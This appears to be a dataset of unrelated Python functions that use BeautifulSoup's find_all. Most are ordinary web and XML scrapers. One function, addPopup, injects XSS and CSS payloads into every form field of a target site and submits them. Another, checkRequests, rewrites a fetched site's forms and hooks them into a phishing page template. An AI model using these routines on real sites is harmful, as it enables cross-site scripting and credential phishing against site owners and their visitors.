def main(): href = 'https://tw.stock.yahoo.com/q/q?s=2412' page = urlopen(href) ''' try: href = 'https://tw.stock.yahoo.com/q/q?s=2412' session = requests.Session() s_time = time.time() page = urlopen(href) e_time = time.time() print ( str(e_time - s_time) + ' was costed to get a page.' ) except requests.exceptions.HTTPError: return None ''' soup = BeautifulSoup(page) #print(soup.prettify()) # using BequtifulSoup 3 if soup is None: print('soup is none') # align="center" bgcolor="#FFFfff" nowrap head = [] for th in soup.find_all(['th'], width='55'): head.append(th.text) value = [] for td in soup.find_all(['td'], bgcolor='#FFFfff'): value.append(td.text) for i in range(0,len(head)): print ( head[i] + ' ' + value[i].rstrip() ) # /logos/doodles/2014/world-cup-2014-42-4675815216250880-hp.gif '''
def word_parser(word_link) : opener = urllib2.build_opener() opener.addheaders = [("User-agent", "Mozilla/5.0")] word_page = opener.open(word_link) word_soup = BeautifulSoup(word_page) the_word = re.sub('http://thesaurus.com/browse/', '', str(word_link)) word_check = the_word word_check_class = None word_extract = "Start" while word_extract != None : word_extract = re.search(re.compile('<table cellspacing="5" class="the_content">.*?</table>', re.DOTALL), str(word_soup)).group() word_extract_soup = BeautifulSoup(word_extract) for link in word_extract_soup.find_all("a", "nud"): word_check = link.get_text() if word_check != the_word : break word_check_class = word_extract_soup.find_all("div", "adjHdg") if str(word_check_class) != "[]" : break parser_core(word_extract) word_soup = re.sub(re.compile('<table cellspacing="5" class="the_content">.*?</table>', re.DOTALL), '\n', str(word_soup), 1) word_extract_none = re.search(re.compile('<table cellspacing="5" class="the_content">.*?</table>', re.DOTALL), str(word_soup)) if word_extract_none == None : break
def search(self, terms): torrents = [] p = [] if terms.find(' '): p = terms.split(' ') else: p.append(terms) self.urlTemp = self.url if p[0] == "series" or p[0] == "films": if p[0] == "series": self.urlTemp += "/torrents_series.html" if p[0] == "films": self.urlTemp += "/torrents_films.html" if len(p) > 1: self.urlTemp += ",page-" + str(int(int(p[1]) - 1)) else: search = self.clean(terms) search = search + ".html" self.urlTemp += self.path + search try: f = requests.get(self.urlTemp, cookies=self.tokens, headers=self.headers) except: self.initializeScraper() try: f = requests.get(self.urlTemp, cookies=self.tokens, headers=self.headers) except: if (f.status_code != requests.codes.ok): f.raise_for_status() raise Exception('something wrong') response = f.text if self.error in response: # raise Exception("no torrent") return torrents else: soup = BeautifulSoup(response, 'html.parser') tds = soup.find_all("td") for td in tds: if td.i != None: if "fa" in td.i.get("class"): attributs = td.parent.find_all("td") f2 = requests.get(td.a['href'], cookies=self.tokens, headers=self.headers) soup = BeautifulSoup(f2.text, 'html.parser') dl = soup.find_all( 'a', {'class': "btn btn-danger download"}) torrents.append({ 'url': self.url + dl[1]['href'], 'name': td.a.text.encode('utf-8'), 'seeds': int(attributs[2].text), 'leechers': int(attributs[3].text), }) return torrents
def getTrack(content): selected_track = None sleep(0.5) request_content_page = requests.get(tunefind_search_uri + content['uri'], headers) soup = BeautifulSoup(request_content_page.text, 'html.parser') all_tracks = soup.find_all( class_='AppearanceRow__container___XH3q9' ) if content['type'] == 'artist' else soup.find_all( class_='SongRow__container___3eT_L') if not len(all_tracks): print("We couldn't find any songs for this %s" % (content['type'])) return minEntryIndex = int(min(range(len(all_tracks))) + 1) maxEntryIndex = int(max(range(len(all_tracks))) + 1) if minEntryIndex == maxEntryIndex: playback_link = extractMediaLink(all_tracks[0]) openLink(playback_link) return for index, track_single in enumerate(all_tracks): song_title = track_single.find( class_='AppearanceRow__songInfoTitle___3nWel' ) if content['type'] == 'artist' else track_single.find( class_='SongTitle__link___2OQHD') print('Title: %s' % (song_title.text)) print('Index: %d' % (int(index) + 1)) select_number = input( 'Please select a number from %d to %d for the track you want: ' % (minEntryIndex, maxEntryIndex)) while not select_number: select_number = input('Please select a number from %d to %d: ' % (minEntryIndex, maxEntryIndex)) while not int(select_number) >= minEntryIndex: select_number = input('Please select a number from %d to %d: ' % (minEntryIndex, maxEntryIndex)) while not int(select_number) <= maxEntryIndex: select_number = input('Please select a number from %d to %d: ' % (minEntryIndex, maxEntryIndex)) selected_track = all_tracks[int(select_number) - 1] playback_link = extractMediaLink(selected_track) openLink(playback_link)
def subcommand_news_find(self, user, dst, args): """Queries Google News for the first page of news results for a given keyword. Syntax: {0}news find <keyword> """ if not user.admin: raise PluginBase.InvalidPermission try: # TODO: Consider the safety of directly placing user input r = requests.get(self.strings.URL_GOOGLE_SEARCH.format(args)) except requests.ConnectionError: self.irch.say(self.strings.CONNECTION_ERROR, dst) return r.encoding = 'utf-8' soup = BeautifulSoup(r.text) titles = soup.find_all(class_='r') search_set = [] for tag in titles: url = tag.contents[0].attrs['href'].split('=', 1)[1] title = tag.text parent = tag.parent source, timestamp = parent.find(class_='f').text.split(' - ') summary = parent.find(class_='st').text search_set.append([title, timestamp, source, url, summary]) if len(search_set) > 0: self.news['set'] = NewsSet(name='Search: {0}'.format(args), set_=search_set) self.irch.say(self.news['set'].get(), dst) else: self.irch.say(self.strings.KEYWORD_NOT_FOUND, dst)
def parseHTML(page, output_f): array = [] soup = BeautifulSoup(page,'html.parser') for div in soup.find_all('div',class_ = DIV_SELECTOR): try: event = div.find('div',class_ = EVENT_SELECTOR) if event: elt ={} link = event.find('a') text = link.get_text() if isVisit(text): elt['visit'] = text else : elt['query_text'] = text elt['link'] = link["href"] elt['date'] = event.find('br').get_text() meta = div.find('div',class_ =META_SELECTOR) if meta : elt['meta'] = meta.get_text() array.append(elt) except: print "Failed to parse elt" print array print output_f with open(output_f, 'w') as outfile: json.dump(array, outfile)
def getEcNumbers(file): handler = open(file).read() soup = Soup(handler, 'xml') reactions = soup.find_all('reaction') ec_numbers = {} for reaction in reactions: links = reaction.find_all("li") BiGG_ID = "" EC_number = "" for link in links: if "identifiers.org/ec-code" in link['resource']: EC_number = link['resource'][31:] elif "identifiers.org/bigg.reaction" in link['resource']: BiGG_ID = reaction['id'] if 'R_' in BiGG_ID: BiGG_ID = BiGG_ID[2:] if EC_number and BiGG_ID: # CHANGED: now we just save the EC number, since the names of the # enzymes and metabolites were never used for querying Brenda. ec_numbers[BiGG_ID] = EC_number return ec_numbers
def get_json(): try: from BeautifulSoup import BeautifulSoup except ImportError: from bs4 import BeautifulSoup def get_website_source(url: str) -> str: request_headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) ' + 'Chrome/35.0.1916.47 Safari/537.36' } request = urllib.request.Request(url, headers=request_headers) with urllib.request.urlopen(request) as response: # print(response.read()) return response.read().decode('utf-8') print('Download page ') source = get_website_source( 'http://ftp.ebi.ac.uk/pub/databases/RNAcentral/current_release/json/') # print(source) parsed_html = BeautifulSoup(source, "lxml") names_json = [] for row in parsed_html.find_all('a'): href = row['href'] if 'ensembl-xref-' in href: names_json.append(href) return names_json
def gather_html(): stat_ids = [] for category in category_labels: category_url = category_url_stub % (category) page = requests.get(category_url) html = BeautifulSoup(page.replace('\n',''), 'html.parser') for table in html.find_all("div", class_="table-content"): for link in table.find_all("a"): stat_ids.append(link['href'].split('.')[1]) starting_year = 2015 #page in order to see which years we have info for for stat_id in stat_ids: url = url_stub % (stat_id, starting_year) page = requests.get(url) html = BeautifulSoup(page.replace('\n',''), 'html.parser') stat = html.find("div", class_="parsys mainParsys").find('h3').text print stat directory = "stats_html/%s" % stat.replace('/', ' ') #need to replace to avoid if not os.path.exists(directory): os.makedirs(directory) years = [] for option in html.find("select", class_="statistics-details-select").find_all("option"): year = option['value'] if year not in years: years.append(year) url_filenames = [] for year in years: url = url_stub % (stat_id, year) filename = "%s/%s.html" % (directory, year) if not os.path.isfile(filename): #this check saves time if you've already downloaded the page url_filenames.append((url, filename)) jobs = [gevent.spawn(gather_pages, pair[0], pair[1]) for pair in url_filenames] gevent.joinall(jobs)
def get_comment(self, item): html = self.__down_load(item, 1) # print html soup = BeautifulSoup(html) if soup: for l in soup.find_all(attrs={'class': 'u-con'}): print l.string
def olx_parser(home_ids): data = [] page = requests.get(OLX_URL) soup = BeautifulSoup(page.text, "lxml") tables = soup.find_all('table', attrs={'summary': 'Ogłoszenie'}) for table in tables: id = table.attrs['data-id'] if id in home_ids: continue text = "" url = "" img = "" table_body = table.find('tbody') rows = table_body.find_all('tr') for row in rows: cols = row.find_all('td') if cols[0].contents[1].name == 'a': url = cols[0].contents[1].attrs['href'] if cols[0].contents[1].contents[1].name == 'img': img = cols[0].contents[1].contents[1].attrs['src'] cols = [ele.text.rstrip() for ele in cols] for col in cols: text = text + col.replace("\n", " ") + " " while ' ' in text: text = text.replace(' ', ' ') data.append(Home(table.attrs['data-id'], text, url, img)) return data
def find_tag(html, tag): # parse text parsed_html = BeautifulSoup(html) tags_all = parsed_html.find_all(tag) # find all instances of tag and its weight attribute, if any tags = [] weights = [] if tags_all: for item in tags_all: tags.append(item.text.strip()) if 'weight' in item.attrs: weights.append(item['weight']) # return results in special cases if not tags: return '', '' elif 'NO CATEGORIES' in tags: return 'NO CATEGORIES', '' elif len(tags) == 1 and len(weights) == 1: return tags[0], weights[0] elif len(tags) == 1 and not weights: return tags[0], '' # return results return tags, weights
def extract_tenders_from_web_page_by_url(url): html = requests.get(url).text parsed_html = BeautifulSoup(html, "html.parser") if is_last_page(parsed_html): return None a = parsed_html.find_all("a", {"class": "shortestProcedures__item"}) tender_list = [] for tender in a: t = Tender() t.link = tender['href'] t.number = tender.find("div", { "class": "shortestProcedures__cell shortestProcedures__cell--number" }).get_text() t.description = tender.find( "div", { "class": "shortestProcedures__cell shortestProcedures__cell--description" }).get_text() t.company = tender.find("span", { "class": "shortestProcedures__customerName" }).get_text() t.date = tender.find("span", { "class": "shortestProcedures__date" }).get_text() t.price = tender.find( "span", { "class": "shortestProcedures__price shortestProcedures__price--noPrice" }).get_text() tender_list.append(t) return tender_list
def poslaju_info(trackingno): _data = {'trackingNo03': trackingno} response = requests.post( 'https://www.pos.com.my/postal-services/quick-access/?track-trace', data=_data).text if "Please insert the correct Tracking Number.No" in response: return None regex = re.compile(r'var strTD = "(.*?)</table>";', re.S | re.M) table = regex.search(response).group(1) soup = BeautifulSoup(table, "lxml") rows = soup.find_all("table")[1].find_all("tr") data = [] for row in rows: cells = row.find_all("td") items = [] for cell in cells: items.append(truncate(cell.text.strip())) data.append(items) data.pop(0) # first row has headers print( tabulate.tabulate(data, headers=["datetime", "details", "location"], tablefmt="simple"))
def parse_table( source: str, interpret_cells: bool = True) -> Tuple[List[str], List[List[str]]]: if interpret_cells: for replacement in sub_sup_replacements: source = source.replace(replacement, sub_sup_replacements[replacement]) parsed_html = BeautifulSoup(source, "lxml") column_count = None header = [] rows = [] current_rowspans = [] for row in parsed_html.find_all('tr'): cells = [x for x in row.find_all('td')] if len(cells) == 0: cells = [x.text.strip() for x in row.find_all('th')] column_count = len(cells) current_rowspans = [[0, None]] * column_count header = cells else: if column_count is None: column_count = len(cells) current_rowspans = [[0, None]] * column_count for i in range(0, len(current_rowspans)): if current_rowspans[i][0] > 0: cells.insert(i, current_rowspans[i][1]) current_rowspans[i][0] -= 1 for i in range(0, len(cells)): if 'rowspan' in cells[i].attrs: current_rowspans[i][0] = int(cells[i].attrs['rowspan']) - 1 del cells[i].attrs['rowspan'] current_rowspans[i][1] = cells[i] rows.append([get_cell_contents(x, interpret_cells) for x in cells]) return header, rows
def lel_info(trackingnumber): response = requests.get("https://tracker.lel.asia/tracker?trackingNumber="\ + trackingnumber\ + "&lang=en-US") soup = BeautifulSoup(response.text, "html.parser") trace__date_rows = soup.find_all('div', {'class': 'trace__date_row'}) data = [] for trace__date_row in trace__date_rows: elem = trace__date_row.find("div", {"class": "trace__date"}).text date = " ".join(elem.split()) trace__items = trace__date_row.find_all('tr', {'class': 'trace__item'}) for trace__item in trace__items: time = trace__item.find('span', {'class': '.trace__time'}).text value = trace__item.find('span', { 'class': 'trace__event-value' }).text data.append([date, time, value]) t_headers = "Date Time Description".split(" ") print(t(data, headers=t_headers))
def getmovielist(html): soup=BeautifulSoup(html) divs=soup.find_all('ul',{'class':'mod_list_pic_130'}) for div_html in divs: div_html = str(div_html).replace('\n','') getmovie(div_html)
def pridobiXML(pot): #Pridobi datoteke datoteke = [f for f in listdir(pot) if isfile(join(pot, f))] st = 0 print("-----" + str(len(datoteke)) + " datotek pridobljenih-----") #Seznam lematiziranih clankov clanki_lem = [] print("-----Razvrščanje besed v objekte-----") #Preberi datoteke v UTF-8 for d in datoteke: if (st % 100 == 0): print(".", end="") fileObj = codecs.open(pot + d, "r", "utf-8") soup = BeautifulSoup(fileObj, 'xml') words = soup.find_all('w') datum = d.split("_")[1:] datum[-1] = datum[-1][0:4] clanki_lem.append([]) #Pridobi besede in jih shrani v seznam for w in words: lb = LematiziranaBeseda(w['lemma'], w['msd'], w.get_text(), datum) clanki_lem[st].append(lb) st += 1 return clanki_lem
def querySite(domain): print('Now visiting ' + domain) sleep(3) request_search_page = requests.get(domain, headers=headers) soup = BeautifulSoup(request_search_page.text, 'html.parser') results = soup.find_all(class_='g') if request_search_page.status_code is not 200: print( 'Error: The URL you are trying to access is returning a status code of %s' % (request_search_page.status_code)) print('This is the response we got: %s' % (request_search_page.text)) return if not len(results): print('We couldn\'t find any pages for this URL: %s' % (domain)) return for result in results: url = result.find('a')['href'] parsed_url = urllib.parse.urlparse(url) if len(parsed_url.query) > 0 or parsed_url.query is not None: query_params = urllib.parse.parse_qs(parsed_url.query) if not isEmpty(query_params) and 'q' in query_params: url = urllib.parse.parse_qs(parsed_url.query)['q'][0] if len(str(url)) < 1: continue print('Now crawling ' + url) sleep(3) meta_title = getMeta('title', url) meta_description = getMeta('description', url) if url is None: url = 'N/A' if meta_title is None: meta_title = 'N/A' if meta_description is None: meta_description = 'N/A' message = str("URL: %s Title: %s Description: %s") % (url, meta_title, meta_description) print(message, file=outfile) if soup.find(isNextLink) is None: return next_step_link = str(google_base_uri + soup.find(isNextLink)['href']) if next_step_link is not None: querySite(next_step_link)
def function(message): news = urllib.request.urlopen( 'https://ttrcoin.com/article/novosti.12/').read() parsed_html = BeautifulSoup(news) links = parsed_html.find_all('a', attrs={'class': 'attachHolder'}) bot.reply_to( message, "https://ttrcoin.com/article/novosti.12/" + links[1].get('href'))
def parse_xml(output): try: from BeautifulSoup import BeautifulSoup except ImportError: from bs4 import BeautifulSoup try: path = sys.argv[1] file = '../{}/bin/Debug/TestResult.xml' file = file.format(path) xml = open(file) except: print( 'Error: Enter a valid file path argument or file not found or inaccessible' ) return -1 body = [] soup = BeautifulSoup(xml, 'xml') message = '' log = '' for tag in soup.find_all('test-case'): try: runName = tag['classname'] stepName = tag['methodname'] except: runName = tag['fullname'] stepName = tag['name'] status = tag['result'] if tag.find('start-time') is not None and tag.find( 'end-time') is not None: start = tag['start-time'] startArr = start.split() start = startArr[0] + 'T' + startArr[1] end = tag['end-time'] endArr = end.split() end = endArr[0] + 'T' + endArr[1] else: start = None end = None if status == "Failed": status = "FAIL" elif status == "Passed": status = "PASS" else: status = "SKIP" if status == 'FAIL': if tag.find('stack-trace') is not None: log = tag.find('stack-trace').text log = base64.b64encode(bytes(log, 'utf-8')) log = log.decode('utf-8') if tag.find('message') is not None: message = tag.find('message').text else: message = '' log = '' value = create_test_logs_json(runName, stepName, status, message, log, start, end, output) body.append(value) return body
def run(self): while self.CRAWL: # print "Waiting for new URL" link = self.urlq.get() # get the Original Link try: # print "Waiting to fetch data " data = urllib2.urlopen(link).read() # Fetch data form the Original Link with 15seconds as timeout except: print "Check Your Internet Connection it has either disconnected or is slow" self.urlq.task_done() continue try: soup = BeautifulSoup(data, 'html.parser') for atag in soup.find_all('a'): # Get the list of all links within Original Link lnk = atag.get('href') if lnk is None: continue else: lnk = lnk.encode('utf-8') # Convert the links to utf encoding if lnk in UniqueURLs: # Avoid crawling visited links so that it doesnt go into a loop! continue if lnk.startswith('http:') or lnk.startswith('https:'): # print "Normal links "+lnk self.urlq.put(lnk) elif lnk.startswith('javascript:'): # Continue loop if the link is a javascript call # print "Javascript call "+lnk continue elif lnk.startswith('#'): # Continue loop if the link is a #tag/fragments # print "#tags" continue else: # print "Relative links "+urlparse.urljoin(link,lnk) self.urlq.put(urlparse.urljoin(link, lnk) + "") # convert relative link into absolute link and add to Queue except Exception, e: print "Exception has occured with this link", e, lnk with lock: self.UniqueURLs[link] = 1 # Put the visited link into a dictionary so that already crawled links can be avoided if len(self.UniqueURLs) < LIMIT: self.CRAWL = False # Set CRAWL to false to stop further crawling print self.name + " LIMIT has reached The rest of the unique URLs will be added to the dictionary and saved!" while self.urlq.qsize(): # Put the rest of the unique link into the dictionary lnk = self.urlq.get() if lnk in self.UniqueURLs: self.urlq.task_done() continue self.UniqueURLs[lnk] = 1 self.urlq.task_done() self.urlq.task_done()
def parse_results(report): data = open('/root/{}'.format(report)) structure = str(data.readlines()) soup = BeautifulSoup(structure, 'html.parser') tables1 = str(soup.find_all(class_="table table-bordered table-striped")[1]) tables2 = str(soup.find_all(class_="table table-bordered table-striped")[2]) tables3 = str(soup.find_all(class_="table table-bordered table-striped")[3]) soup1 = BeautifulSoup(tables1, 'html.parser') soup2 = BeautifulSoup(tables2, 'html.parser') soup3 = BeautifulSoup(tables3, 'html.parser') rrd4k_data = soup1.find_all('td')[3].string rwd4k_data = soup1.find_all('td')[5].string rrd16MiB_data = soup2.find_all('td')[3].string rwd16MiB_data = soup2.find_all('td')[5].string try: rws10ms_data = int(soup3.find_all('td')[3].string) except ValueError: rws10ms_data = 0 try: rws30ms_data = int(soup3.find_all('td')[5].string) except ValueError: rws30ms_data = 0 rws100ms_data = int(soup3.find_all('td')[7].string[2:]) rrd4k_iops = int(re.findall(r"[\d']+", rrd4k_data)[0]) rwd4k_iops = int(re.findall(r"[\d']+", rwd4k_data)[0]) rrd16MiB_bandwidth = int(re.findall(r"[\d']+", rrd16MiB_data)[0]) rwd16MiB_bandwidth = int(re.findall(r"[\d']+", rwd16MiB_data)[0]) rrd4k_dev = int(re.findall(r"[\d']+", rrd4k_data)[-1]) rwd4k_dev = int(re.findall(r"[\d']+", rwd4k_data)[-1]) rrd16MiB_dev = int(re.findall(r"[\d']+", rrd16MiB_data)[-1]) rwd16MiB_dev = int(re.findall(r"[\d']+", rwd16MiB_data)[-1]) return dict({"rws10ms_data": rws10ms_data, "rws30ms_data": rws30ms_data, "rws100ms_data": rws100ms_data, "rrd4k_iops": rrd4k_iops, "rwd4k_iops": rwd4k_iops, "rrd16MiB_bandwidth": rrd16MiB_bandwidth, "rwd16MiB_bandwidth": rwd16MiB_bandwidth, "rrd4k_dev": rrd4k_dev, "rwd4k_dev": rwd4k_dev, "rrd16MiB_dev": rrd16MiB_dev, "rwd16MiB_dev": rwd16MiB_dev})
def decodeWebpage(url): r = requests.get(url) soup = BeautifulSoup(r.text) for story_heading in soup.find_all(class_="stroy-heading"): if story_heading.a: print(story_heading.a.text.replace("\n", " ").strip()) else: print(story_heading.contents[0].strip())
def job_fnF(): url = 'https://www1.nseindia.com/live_market/dynaContent/live_watch/option_chain/optionKeys.jsp?segmentLink=17&instrument=OPTIDX&symbol=NIFTY&date=' + edate response = requests.get(url) resp = response.content soup = BeautifulSoup(resp) table1 = soup.find('table') niftyrow = [] for row1 in table1.findAll('b'): text1 = row1.text.replace('style','') niftyrow.append(text1) niftyval = int(text1[5:10]) + 2 callstrk = int(round(niftyval, -2)) + 300 putstrk = callstrk - 700 callstring = "%d.00" %callstrk for row1 in soup.find_all('tr'): cells = row1.find_all('td') for cell in cells: value = cell.string if value == callstring: celln = 0 for cell in cells: celln = celln + 1 value = cell.string if celln == 10: #print CallPrice putstring = "%d.00" %putstrk for row1 in soup.find_all('tr'): cells = row1.find_all('td') for cell in cells: value = cell.string if value == putstring: celln = 0 for cell in cells: celln = celln + 1 value = cell.string if celln == 14: PutPrice = value #print PutPrice indtime= datetime.now() + timedelta(hours=5, minutes=30) ddtime = '{:%D:%H:%M:%S}'.format(indtime) # print "Nifty", niftyval, "Calls",callstrk, "Puts",putstrk, datetime.now(), PutPrice, OpenNifty msg = "New: Sell Calls %d , Puts %d , Thanks! " %(callstrk, putstrk) check_output(["yowsup-cli", "demos", "-M","-c", "config", "-s", "*****@*****.**", "F%s" % msg]) check_output(["yowsup-cli", "demos", "-M","-c", "config", "-s", "*****@*****.**", "F%s" % msg])
def get_links(search_name): search_name = search_name.replace(' ', '+') url = url_base.format(search_name, 0) request = ulib.Request(url, None, headers) json_string = ulib.urlopen(request).read() page = json.loads(json_string) new_soup = Soup(page[1][1], 'lxml') images = new_soup.find_all('img') links = [image['src'] for image in images] return links
def get_page_words(pdf_file): delete_words = [ '"', ':', ';', '!', '@', '#', '$', '%', '^', '&', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '*', '(', ')', '+', '-', '_', '=', '{', '}', '[', ']', '?', '/', '<', '>', ',', '.', '|', '`', '~', '"', "'", '\\' ] contents = convert_pdf_to_html(pdf_file) # with open(pdf_file) as f: # for line in f.readlines(): # contents += line contents = contents.replace("\n", "") contents = contents.replace("\r", "") # contents = contents.rstrip() pages = contents.split("<a name=")[1:] all_pages = [] for i in range(len(pages)): page_html = BeautifulSoup(pages[i], "html.parser") divs = page_html.find_all('div') spans = [] for div in divs: spans += div.find_all('span') word_list = [] for span in spans: text = span.text.lower() text = text.replace("\\n", " ") text = text.replace("\\r", " ") fin = False while not fin: if text.find("\\xe") >= 0: idx = text.find("\\xe") text = text.replace(text[idx:idx + 12], "") else: fin = True for dw in delete_words: text = text.replace(dw, " ") words = text.split() style = span['style'] bold = ",Bold" in style size = style[style.find("font-size:") + 10:-2] for word in words: if len(word) == 1: continue if word != "": word_list.append([word, size, bold]) all_pages.append(word_list) return all_pages # print (get_page_words("Lec01_note.pdf")[3])
def addPopup(self, url): # (self, url, payload) self.url = url source = urllib.urlopen(self.url) soup = BeautifulSoup(source.read()) print ">>> Reading Source...\n\n" for form in soup.find_all("form"): inputs_submit = [] inputs_field = [] #form_action.append(form.get("action")) # Get URI to will send print ">>> Searching field vulnerabilities...\n\n" for inputs in form.find_all("input"): if inputs.get("type") == "submit": inputs_submit.append(inputs.get("name")) inputs_submit.append(inputs.get("value")) elif inputs.get("type") != "submit": inputs_field.append(inputs.get("name")) else: print "Not found any field vulnerability :(\n\n" for textarea in form.find_all("textarea"): inputs_field.append(textarea.get("textarea")) vectorJS = {} path_archive1 = "core/css.js" if os.path.isfile(path_archive1) == True: for field in inputs_field: vectorJS[field] = """<script src="http://localhost/GSoC/css.js"></script>""" vectorJS[inputs_submit[0]] = inputs_submit[1] send_vector = urllib.urlencode(vectorJS) print ">>> Vector .js attack...!\n\n" print send_vector print "-"*75 parts = urlparse.urlsplit(self.url) a = '' for i in parts.path.split("/")[0:-1]: a += i + "/" send_url = parts.scheme + "://" + parts.netloc + a + form.get("action").split("../")[-1] b = '' for j in parts.path.split("/")[0:-2]: b += j + "/" send_url2 = parts.scheme + "://" + parts.netloc + b + form.get("action").split("../")[-1] urllib.urlopen(send_url, send_vector) urllib.urlopen(send_url2, send_vector) # Because some pages used '../send.php' to send a request vectorCSS = {} path_archive2 = "core/injection.css" if os.path.isfile(path_archive2) == True: for field in inputs_field: vectorCSS[field] = """<link rel="stylesheet" href="http://localhost/GSoC/injection.css"/>""" vectorCSS[inputs_submit[0]] = inputs_submit[1] send_vector2 = urllib.urlencode(vectorCSS) print ">>> Vector .css attack...!\n\n" print send_vector2 print "-"*75 urllib.urlopen(send_url, send_vector2) urllib.urlopen(send_url2, send_vector2)
def alphabetical_parser(alphabetical_link) : opener = urllib2.build_opener() opener.addheaders = [("User-agent", "Mozilla/5.0")] alphabetical_page = opener.open(alphabetical_link) alphabetical_soup = BeautifulSoup(alphabetical_page) for link in alphabetical_soup.find_all("a", "result_link"): section_link = link.get("href") section_parser(section_link)
def parseTextFromHtml(html): text = "" try: from BeautifulSoup import BeautifulSoup except ImportError: from bs4 import BeautifulSoup soup = BeautifulSoup(html, "lxml") allResult = soup.find_all("div", class_="_3-96 _2let") for item in allResult: text += item.text + "\n" return text
def getURL(msg): """ :param page: html of web page (here: Python home page) :return: urls in that page """ soup = BeautifulSoup(msg) links = soup.find_all('http:') for tag in links: link = tag.get('//', None) if link != None: print link
def get_recipes_from_page(page_num): res = requests.get(BASE_URL + "/recipes/?page=" + str(page_num)) res_html = BeautifulSoup(res.text, "html.parser") recipes_list = [] article_tags = res_html.find_all("article") for i in article_tags: try: if i.find("a")["href"].startswith("/recipe/"): recipes_list.append(i.find("a")["href"]) except (KeyError, TypeError): pass return recipes_list
def section_parser(section_link) : opener = urllib2.build_opener() opener.addheaders = [("User-agent", "Mozilla/5.0")] section_page = opener.open(section_link) section_soup = BeautifulSoup(section_page) for link in section_soup.find_all("a", "result_link"): word_link = link.get("href") text_file.write("%s"%word_link) text_file.write("\n") word_parser(word_link)
def checkRequests(self,siteName): try: html = urlopen(siteName).read() request = BeautifulSoup(html) try: for tag in request.find_all('form'): tag['method'],tag['action'] ='post','' except Exception: pass self.CheckHookInjection(request,'Templates/Phishing/web_server/index.html') except URLError: QMessageBox.warning(self,'Request HTTP','It seems like the server is down.') return False return True
def parse_html(): try: from BeautifulSoup import BeautifulSoup except ImportError: from bs4 import BeautifulSoup filename = 'temp.html' html = open(filename, "r").read() parsed_html = BeautifulSoup(html, "lxml") links = parsed_html.find_all("a") for link in links: print(str(link.text) + " Pattern," + ",https://en.wikipedia.org" + str(link.get("href")) + ",Wikipedia")
def scraping(cve): parsers = ['html.parser'] r = requests.get('https://nvd.nist.gov/vuln/detail/' + cve) soup = BeautifulSoup(r.content, "lxml") i = 0 critical = "" size = len(soup.find_all('p')) description = soup.find_all('p')[24].text crit = soup.find_all('p')[27].text i = 0 more = [] for line in crit.splitlines(): if i == 4: critical = line i = i + 1 if critical.startswith("N") == True: critical = "N/A" return description, critical
def genius_scrape_url(url, title): proxy = urllib.request.getproxies() r = requests.get(url, timeout=10, proxies=proxy) try: document = BeautifulSoup(r.text, 'html.parser') # Genius seems to be returning two types of content # One has a 'lyrics' div, the other has Lyrics__Container lyrics_div = document.find('div', class_='lyrics') if lyrics_div: lyrics_paragraphs = [] [ lyrics_paragraphs.append(elem.get_text()) for elem in lyrics_div.find_all('p') ] lyrics = ''.join(lyrics_paragraphs) return LYRICS_TUPLE(lyrics.strip(), url) lyrics_containers = document.find_all( 'div', class_=re.compile('Lyrics__Container*')) if lyrics_containers: lyrics = '' for lyrics_container in lyrics_containers: # Genius puts annotations nested with the actual lyrics spans # In order to extract the lyrics correctly, need to replace HTML line breaks # with \n line breaks for br in lyrics_container.find_all('br'): br.replace_with('\n') lyrics += lyrics_container.text return LYRICS_TUPLE(lyrics, url) lyrics_container = document.find( 'div', class_=re.compile('LyricsPlaceholder__Message*')) if lyrics_container: # When the song is an instrumental, Genius sometimes puts a LyricsPlaceholder div lyrics = '[Instrumental]' return LYRICS_TUPLE(lyrics, url) except: if genius_key == '': logger.log(logger.LOG_LEVEL_INFO, SEARCH_ERROR.format(source='Genius', file=title)) else: logger.log(logger.LOG_LEVEL_ERROR, PARSE_ERROR.format(source='Genius', file=title)) return False return False
async def g_search_custom(message, client, search): loop = asyncio.get_event_loop() headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'} search = search.replace(' ', '+') async with aiohttp.get('https://www.google.com/search?q={}&start=1&num=1'.format(search), headers=headers) as gr: try: from BeautifulSoup import BeautifulSoup except ImportError: from bs4 import BeautifulSoup html = await gr.text() results = [] parsed_html = BeautifulSoup(html, "html.parser") for item in parsed_html.find_all('h3', attrs={'class': 'r'}): results.append(str(item.a['href']).replace('/url?q=', '').split('&sa=U&ved=')[0]) await client.send_message(message.channel, 'Top result for `{}`: '.format(search) + ''.join(results[0]))
def get_completions(request): completion1 = "" completion2 = "" completion3 = "" if request.method == "POST": html = request.POST.get('content') to_parse = find_between(html, "<p>---</p>", "<p>---</p>") if (to_parse[0] != ""): s = BeautifulSoup(to_parse[0], "html.parser") to_complete = ''.join(s.find_all(text=True)) openai.api_key = os.getenv("OPENAI_API_KEY") pre_prompt = ''.join([ "mount everest 8000m above see level\n", "lies in India and nepal\n", "###\n", "Mount Everest is 8000m above sea level and spans across India and Nepal\n", "###\n", "network for large number devices\n", "tested with 10\n", "no errors\n", "50%% less power usage\n", "###\n", "The network architecture was designed to be used for a large number of devices. We tested it with 10 devices at our lab, no errors while encountered. This implementation also reduces power consumption by 50%% relative to the previous solution.\n", "###\n", "first switch trial\n", "distributions match error data\n", "compare frequencies of strategies used on trial 1\n", "distribution of stratigies in older children different than 1 year olds and apes", "1 year olds and apes similar", "###\n", "the first switch trial revealed that distributions match the error data. Comparison of frequencies of strategies adapted on trial 1 showed that distribution of first-choice strategy in older children differed significantly from those of 1-year-olds and apes, which were in turn very similar to each other.\n", "###\n" ]) print(pre_prompt) test = openai.Completion.create(engine="davinci-instruct-beta", prompt=pre_prompt + to_complete + "\n###\n", max_tokens=400, temperature=0.3, stop="###", n=3) print(test) print('---------------') print(to_parse[1]) print(to_parse[2]) completion1 = test['choices'][0]['text'] completion2 = test['choices'][1]['text'] completion3 = test['choices'][2]['text'] return HttpResponse(json.dumps({ "completion1": completion1, "completion2": completion2, "completion3": completion3 }), content_type="application/json")
